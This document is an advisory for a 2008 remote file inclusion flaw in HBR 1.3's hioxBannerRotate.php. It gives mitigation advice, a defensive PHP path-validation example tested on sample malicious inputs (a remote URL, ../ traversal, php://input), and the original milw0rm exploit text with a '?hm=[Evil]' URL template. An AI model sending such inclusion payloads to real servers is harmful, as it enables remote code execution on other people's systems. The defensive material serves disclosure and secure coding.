Vendor: HBR 1.3
By: Ghost Hacker [ R-H TeaM ]
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: HBR 1.3
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

HBR 1.3 (hm) Remote File Inclusion Vulnerability

HBR 1.3 (hm) is vulnerable to remote file inclusion. The script hioxBannerRotate.php uses the hm parameter directly in an include statement, so an attacker can exploit it by sending a malicious URL to the vulnerable script. The URL carries the path to a malicious file, which is then included and executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before it is used in the application, in particular before it reaches an include path. Additionally, the application should be configured to only allow access to files from a specific directory.
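
The mitigation above applied to the include quoted in the advisory, as an added example that is not HBR's own code: resolve_props, the install-root layout and the sample inputs are hypothetical and constructed for the demo. It goes slightly beyond the remote-URL case by also refusing ../ traversal and stream wrappers.

```php
<?php
// Added example, not HBR's own code. Pattern quoted in the advisory:
//     include "$hm/admin/props.php";   // $hm reachable from ?hm=...

// Hypothetical helper: map a caller-supplied directory name to props.php
// under a fixed install root, or throw if it points anywhere else.
function resolve_props(string $root, string $hm): string
{
    // Refuse URL schemes and stream wrappers (http://, ftp://, php://, data:).
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $hm) || strpos($hm, "\0") !== false) {
        throw new InvalidArgumentException('scheme or NUL byte in path');
    }
    $rootReal = realpath($root);
    // realpath() collapses ../ and symlinks; it returns false if the file is missing.
    $file = realpath($root . '/' . $hm . '/admin/props.php');
    if ($rootReal === false || $file === false
        || strpos($file, $rootReal . DIRECTORY_SEPARATOR) !== 0) {
        throw new InvalidArgumentException('props.php not under install root');
    }
    return $file;
}

// Constructed layout for the demo: <tmp>/.../site/banner/admin/props.php
$site = sys_get_temp_dir() . '/hbr_demo_' . getmypid() . '/site';
mkdir($site . '/banner/admin', 0700, true);
file_put_contents($site . '/banner/admin/props.php', "<?php \$propsLoaded = true;\n");
// A props.php outside the root, to show that traversal is refused.
mkdir(dirname($site) . '/other/admin', 0700, true);
file_put_contents(dirname($site) . '/other/admin/props.php', "<?php\n");

// Constructed inputs: one legitimate value, three that must be rejected.
$inputs = ['banner', 'http://example.invalid/x', '../other', 'php://input'];
foreach ($inputs as $hm) {
    try {
        include resolve_props($site, $hm);
        echo "$hm: included\n";
    } catch (InvalidArgumentException $e) {
        echo "$hm: rejected ({$e->getMessage()})\n";
    }
}
```

Setting allow_url_include = Off in php.ini blocks the remote-URL form at the interpreter level, but it does not stop local traversal, which is why the root check is still needed.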

Exploit-DB raw data:

################################################################################
 HBR 1.3 (hm) Remote File Inclusion Vulnerability
################################################################################
[~] Found : Ghost Hacker [ R-H TeaM ]           |,  .-.  .-.  ,|
[~] HOME  : www.Real-Hack.net                   | )(_o/  \o_)( | 
[~] Email : Ghost-r00t@Hotmail.com              |/     /\     \|
[~] Script : HBR 1.3
[~] Download Script : http://www.hscripts.com/scripts/php/downloads/HBR_1_3.zip
################## [ I love the Messenger of Allah Mohammad ] ##################
[~] Error ( hioxBannerRotate.php ) :
include "$hm/admin/props.php";

[~] Exploit :
http://xxxx/[Path]/hioxBannerRotate.php?hm=[Evil]
################## [ I love the Messenger of Allah Mohammad ] ##################
[~] Gootz :
PROTO & Night Mare & Mr.PaTcH & Aseg-Rabe7 & x.CJP.x & Dmar al3noOoz & 4Bo3tB ..
Mr.JUVE & Mr.hope & LeGeNd HaCkEr & My Blog [ gh0st10.wordpress.com ] ..
All Member Real Hack & All My Friends And All Muslims Hackers ..
################################################################################
 Real Hack Team ( R-H ) ..
################################################################################

# milw0rm.com [2008-06-30]